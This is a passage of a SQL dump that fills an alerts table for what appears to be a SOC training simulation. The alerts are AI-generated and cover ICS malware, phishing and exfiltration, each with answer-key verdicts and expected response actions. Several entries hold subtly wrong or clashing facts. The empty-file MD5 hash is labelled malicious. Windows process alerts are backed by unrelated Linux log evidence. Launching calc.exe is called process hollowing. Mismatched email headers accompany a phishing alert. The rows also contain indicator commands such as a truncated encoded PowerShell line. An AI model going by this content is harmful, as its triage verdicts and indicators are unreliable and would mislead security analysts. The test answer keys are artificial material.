1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.220.101.19\\\",\\\"dst_ip\\\":\\\"192.168.3.5\\\",\\\"username\\\":\\\"guest\\\",\\\"hostname\\\":\\\"gateway.energycorp.local\\\",\\\"failed_attempts\\\":12}\"},{\"timestamp\":\"2026-03-02T13:53:06.973Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user guest from 185.220.101.19 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.220.101.19\\\",\\\"dst_ip\\\":\\\"192.168.3.5\\\",\\\"username\\\":\\\"guest\\\",\\\"hostname\\\":\\\"gateway.energycorp.local\\\",\\\"failed_attempts\\\":12}\"},{\"timestamp\":\"2026-03-02T13:52:06.973Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user guest from 185.220.101.19 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.220.101.19\\\",\\\"dst_ip\\\":\\\"192.168.3.5\\\",\\\"username\\\":\\\"guest\\\",\\\"hostname\\\":\\\"gateway.energycorp.local\\\",\\\"failed_attempts\\\":12}\"},{\"timestamp\":\"2026-03-02T13:51:06.973Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user guest from 185.220.101.19 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.220.101.19\\\",\\\"dst_ip\\\":\\\"192.168.3.5\\\",\\\"username\\\":\\\"guest\\\",\\\"hostname\\\":\\\"gateway.energycorp.local\\\",\\\"failed_attempts\\\":12}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1425, 'Cozy Bear Fileless Malware Detected via Process Hollowing', 'critical', 'MISP', 'A fileless malware attack using process hollowing was detected, attributed to Cozy Bear/APT29. Activity involved advanced evasion techniques.', 'Malware', 'T1055', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T14:50:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.4.10\",\"dst_ip\":\"\",\"username\":\"sysadmin\",\"hostname\":\"server02.energycorp.local\",\"command_line\":\"rundll32.exe hollowed.dll,EntryPoint\"}', '2026-03-02 03:16:22', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"rundll32.exe hollowed.dll,EntryPoint\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command line indicative of process hollowing technique\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.4.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP executing suspicious process\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of process hollowing aligns with known Cozy Bear tactics for stealthy attacks.\"}', 'Expert', 'TI', 9, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.975Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. 
Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:50:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.4.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"sysadmin\\\",\\\"hostname\\\":\\\"server02.energycorp.local\\\",\\\"command_line\\\":\\\"rundll32.exe hollowed.dll,EntryPoint\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.975Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:50:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.4.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"sysadmin\\\",\\\"hostname\\\":\\\"server02.energycorp.local\\\",\\\"command_line\\\":\\\"rundll32.exe hollowed.dll,EntryPoint\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.975Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:50:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.4.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"sysadmin\\\",\\\"hostname\\\":\\\"server02.energycorp.local\\\",\\\"command_line\\\":\\\"rundll32.exe hollowed.dll,EntryPoint\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.975Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:50:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.4.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"sysadmin\\\",\\\"hostname\\\":\\\"server02.energycorp.local\\\",\\\"command_line\\\":\\\"rundll32.exe hollowed.dll,EntryPoint\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.975Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:50:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.4.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"sysadmin\\\",\\\"hostname\\\":\\\"server02.energycorp.local\\\",\\\"command_line\\\":\\\"rundll32.exe hollowed.dll,EntryPoint\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1426, 'Memory-only Rootkit Detected in LSASS Process', 'critical', 'CrowdStrike', 'A memory-only rootkit was detected within LSASS process memory on a critical ICS server, potentially used for credential theft and lateral movement.', 'Malware', 'T1055', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T08:15:32Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"203.0.113.85\",\"username\":\"admin_user\",\"hostname\":\"ICS-Server-01\",\"command_line\":\"rundll32.exe shell32.dll,Control_RunDLL\"}', '2026-03-02 03:19:01', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.85\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 123 times for C2 server activity\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal admin account\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"rundll32.exe shell32.dll,Control_RunDLL\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"Commonly used for process injection\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The presence of a memory-only rootkit in LSASS indicates potential credential theft and lateral movement. Because the implant is memory-resident, capture a full memory image of the host before any reboot or remediation, and coordinate isolation with plant operations since this is an ICS server.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"ICS-Server-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"admin_user\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"admin_user\",\"cmd\":\"powershell.exe 
-nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"admin_user\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.85\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1427, 'DGA Domains Used for C2 Communication Detected', 'high', 'Carbon Black', 'A sophisticated malware using DGA domains for C2 communication was identified on a water treatment plant\'s network.', 'Malware', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T10:45:21Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.50\",\"dst_ip\":\"198.51.100.123\",\"username\":\"operator\",\"hostname\":\"PLC-Master-01\",\"domain\":\"hdsf3d2gds.example.com\"}', '2026-03-02 03:19:01', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.123\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with DGA-based C2 activity\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"hdsf3d2gds.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Domain used by malware for dynamic C2\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"operator\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Regular operator account\"}}],\"expected_actions\":[\"block_ip\",\"block_domain\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of DGA domains for C2 is indicative of an advanced persistent threat targeting the water treatment plant.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.977Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:45:21Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.50\\\",\\\"dst_ip\\\":\\\"198.51.100.123\\\",\\\"username\\\":\\\"operator\\\",\\\"hostname\\\":\\\"PLC-Master-01\\\",\\\"domain\\\":\\\"hdsf3d2gds.example.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.977Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:45:21Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.50\\\",\\\"dst_ip\\\":\\\"198.51.100.123\\\",\\\"username\\\":\\\"operator\\\",\\\"hostname\\\":\\\"PLC-Master-01\\\",\\\"domain\\\":\\\"hdsf3d2gds.example.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.977Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:45:21Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.50\\\",\\\"dst_ip\\\":\\\"198.51.100.123\\\",\\\"username\\\":\\\"operator\\\",\\\"hostname\\\":\\\"PLC-Master-01\\\",\\\"domain\\\":\\\"hdsf3d2gds.example.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.977Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:45:21Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.50\\\",\\\"dst_ip\\\":\\\"198.51.100.123\\\",\\\"username\\\":\\\"operator\\\",\\\"hostname\\\":\\\"PLC-Master-01\\\",\\\"domain\\\":\\\"hdsf3d2gds.example.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.977Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:45:21Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.50\\\",\\\"dst_ip\\\":\\\"198.51.100.123\\\",\\\"username\\\":\\\"operator\\\",\\\"hostname\\\":\\\"PLC-Master-01\\\",\\\"domain\\\":\\\"hdsf3d2gds.example.com\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1428, 'Suspicious Modbus Traffic Detected on SCADA Network', 'high', 'SentinelOne', 'Unusual Modbus traffic patterns were detected, potentially indicating unauthorized PLC manipulation attempt.', 'Lateral Movement', 'T1021', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T12:30:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.100.10\",\"dst_ip\":\"192.168.100.20\",\"username\":\"scada_user\",\"hostname\":\"SCADA-Controller\",\"domain\":\"example.com\"}', '2026-03-02 03:19:01', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.100.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Destination IP within SCADA network\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"scada_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"SCADA network user\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The unusual Modbus traffic suggests a potential attempt to manipulate PLCs within the SCADA network.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.979Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T12:30:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.100.10\\\",\\\"dst_ip\\\":\\\"192.168.100.20\\\",\\\"username\\\":\\\"scada_user\\\",\\\"hostname\\\":\\\"SCADA-Controller\\\",\\\"domain\\\":\\\"example.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.979Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T12:30:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.100.10\\\",\\\"dst_ip\\\":\\\"192.168.100.20\\\",\\\"username\\\":\\\"scada_user\\\",\\\"hostname\\\":\\\"SCADA-Controller\\\",\\\"domain\\\":\\\"example.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.979Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T12:30:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.100.10\\\",\\\"dst_ip\\\":\\\"192.168.100.20\\\",\\\"username\\\":\\\"scada_user\\\",\\\"hostname\\\":\\\"SCADA-Controller\\\",\\\"domain\\\":\\\"example.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.979Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T12:30:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.100.10\\\",\\\"dst_ip\\\":\\\"192.168.100.20\\\",\\\"username\\\":\\\"scada_user\\\",\\\"hostname\\\":\\\"SCADA-Controller\\\",\\\"domain\\\":\\\"example.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.979Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T12:30:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.100.10\\\",\\\"dst_ip\\\":\\\"192.168.100.20\\\",\\\"username\\\":\\\"scada_user\\\",\\\"hostname\\\":\\\"SCADA-Controller\\\",\\\"domain\\\":\\\"example.com\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1429, 'Phishing Email with Malicious URL Detected', 'medium', 'Proofpoint', 'A phishing email was detected targeting a plant operator, containing a malicious URL aimed at credential harvesting.', 'Phishing', 'T1204', 0, 'New', NULL, '{\"timestamp\":\"2026-03-02T09:05:12Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.90\",\"dst_ip\":\"192.168.3.25\",\"username\":\"plant_operator\",\"hostname\":\"HMI-Workstation\",\"email_sender\":\"noreply@fakebank.com\",\"url\":\"http://malicious.example.com\"}', '2026-03-02 03:19:01', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"noreply@fakebank.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Email sender associated with phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"URL not flagged in recent scans\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email appears to be a part of a broad phishing attempt, but the URL was deemed clean upon further analysis.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email with Malicious URL Detected\",\"date\":\"2026-03-02T13:55:06.981Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1430, 'Process Hollowing Detected on Critical ICS Workstation', 'critical', 'Sysmon', 'A process hollowing attack was detected on a critical ICS workstation, potentially indicating an APT-style attack aiming for data exfiltration.', 'Malware', 'T1055.012', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T11:20:37Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.4.15\",\"dst_ip\":\"203.0.113.95\",\"username\":\"system_admin\",\"hostname\":\"ICS-Workstation-02\",\"command_line\":\"cmd.exe /c calc.exe\"}', '2026-03-02 03:19:01', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.95\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"IP linked to known APT infrastructure\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"cmd.exe /c calc.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Command line indicative of process hollowing\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"system_admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Privileged system admin account\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Process hollowing detected, indicating a high-level intrusion attempt on the ICS workstation.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.982Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T11:20:37Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.4.15\\\",\\\"dst_ip\\\":\\\"203.0.113.95\\\",\\\"username\\\":\\\"system_admin\\\",\\\"hostname\\\":\\\"ICS-Workstation-02\\\",\\\"command_line\\\":\\\"cmd.exe /c calc.exe\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.982Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T11:20:37Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.4.15\\\",\\\"dst_ip\\\":\\\"203.0.113.95\\\",\\\"username\\\":\\\"system_admin\\\",\\\"hostname\\\":\\\"ICS-Workstation-02\\\",\\\"command_line\\\":\\\"cmd.exe /c calc.exe\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.982Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T11:20:37Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.4.15\\\",\\\"dst_ip\\\":\\\"203.0.113.95\\\",\\\"username\\\":\\\"system_admin\\\",\\\"hostname\\\":\\\"ICS-Workstation-02\\\",\\\"command_line\\\":\\\"cmd.exe /c calc.exe\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.982Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T11:20:37Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.4.15\\\",\\\"dst_ip\\\":\\\"203.0.113.95\\\",\\\"username\\\":\\\"system_admin\\\",\\\"hostname\\\":\\\"ICS-Workstation-02\\\",\\\"command_line\\\":\\\"cmd.exe /c calc.exe\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.982Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected 
[Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T11:20:37Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.4.15\\\",\\\"dst_ip\\\":\\\"203.0.113.95\\\",\\\"username\\\":\\\"system_admin\\\",\\\"hostname\\\":\\\"ICS-Workstation-02\\\",\\\"command_line\\\":\\\"cmd.exe /c calc.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1431, 'Data Exfiltration via USB Device Detected', 'high', 'Symantec DLP', 'An employee attempted to copy sensitive company files to an unauthorized USB device. This activity was detected by the DLP system.', 'Data Exfil', 'T1059', 1, 'Closed', 266, '{\"timestamp\":\"2026-03-02T08:45:00Z\",\"event_type\":\"file_copy\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"\",\"username\":\"jdoe\",\"hostname\":\"CORP-LAP-123\",\"command_line\":\"copy C:\\\\Sensitive\\\\report.pdf E:\\\\\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-03-02 03:22:45', '2026-03-09 13:26:47', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the employee\'s machine\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with unauthorized data exfiltration attempts\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The file hash is connected to known unauthorized data exfiltration activities. 
Immediate action is required.\"}', 'Beginner', 'DLP', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.984Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:45:00Z\\\",\\\"event_type\\\":\\\"file_copy\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAP-123\\\",\\\"command_line\\\":\\\"copy C:\\\\\\\\Sensitive\\\\\\\\report.pdf E:\\\\\\\\\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.984Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:45:00Z\\\",\\\"event_type\\\":\\\"file_copy\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAP-123\\\",\\\"command_line\\\":\\\"copy C:\\\\\\\\Sensitive\\\\\\\\report.pdf E:\\\\\\\\\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.984Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 